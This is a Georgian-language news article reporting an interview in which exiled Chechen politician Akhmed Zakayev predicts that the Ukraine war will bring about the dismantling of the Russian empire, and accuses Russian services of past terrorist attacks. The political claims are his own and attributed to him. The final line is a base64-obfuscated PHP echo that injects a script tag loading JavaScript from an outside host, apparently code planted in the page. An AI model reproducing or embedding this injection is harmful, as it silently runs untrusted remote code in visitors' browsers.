tube
ავერსი jaluzi
"რაც უფრო გაგრძელდება უკრაინაში ომი, მით უფრო შესაძლებელი გახდება რუსეთის იმპერიის დემონტაჟი" - ამის შესახებ რადიო მაესტროს ექსკლუზიურ ინტერვიუში დევნილობაში მყოფმა ჩეჩნეთის რესპუბლიკა იჩქერიის ყოფილმა პრემიერ-მინისტრმა ახმედ ზაკაევმა განუცხადა.
 
"მე რასაც ვაკვირდები, შეიქმნება საერთაშორისო სამხედრო ტრიბუნალი უკრაინაში ჩადენილი სამხედრო დანაშაულის საკითხზე. ეს ტრიბუნალი არა მხოლოდ უკრაინაში ჩადენილ დანაშაულებს განიხილავს, არამედ იმ ტერორისტულ აქტებზეც იმსჯელებს, რომელიც როგორც ვისაუბრეთ პუტინმა მოსკოვში განახორციელა, როგორიც იყო ნორდ-ოსტი, ბესლანი და ა.შ. ყველა დიდი ტერორისტული დანაშაულის უკან რუსული სპეცსამსახურები იდგნენ და ჩვენ ამის დადასტურებას შევძლებთ. დარწმუნებული ვარ, რომ დღეს ევროკავშირი და ამერიკის შეერთებული შტატები უკრაინის სამხედრო მხარდაჭერით რუსეთის იმპერიის დემონტაჟს ახორციელებს და ეს პროცესი რუსეთის ტრასფორმაციას მოახდენს", - განაცხადა ახმედ ზაკაევმა. 
 
კითხვაზე, ამისათვის საფასურის გადახდა უკრაინას უწევს და ეხ ფასი ძალიან მაღალი ხომ არაა, ახმედ ზაკაევი ასე პასუხობს: 
 
"ფასი ძალიან დიდია და ძალიან სამწუხაროა, მაგრამ  აღნიშნულზე  პასუხისმგებლელი არა ამერიკის შეერთებული შტატები, არა ევროკავშირი, არამედ პუტინი და რუსეთია. ამერიკის შეერთებული შტატები და ევროკავშირი აკეთებენ ყველაფერს, რომ პუტინი გააჩერონ. მათ კარგად ესმით, რომ პუტინის შეჩერება არა მისი დარწმუნებით, საუბრით, არამედ მკაცრი პასუხის გასცემით არის შესაძლებელი. მათ კარგად ესმით, რომ ბირთვული იარაღით მუქარა და შანტაჟი, დაუშვებელია. ისინი ხვდებიან, რომ ასეთი სახელმწიფო  უნდა შეიცვალოს .ვფიქრობ რომ ეს ასეც მოხდება და ჩვენ გავხდებით ამის მომსწრენი", - აცხადებს ახმედ ზაკაევი რადიო მაესტროსთან ინტერვიუში. 
 
ვრცლად ინტერვიუს ნახვა შეგიძლიათ აქ:  
944
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");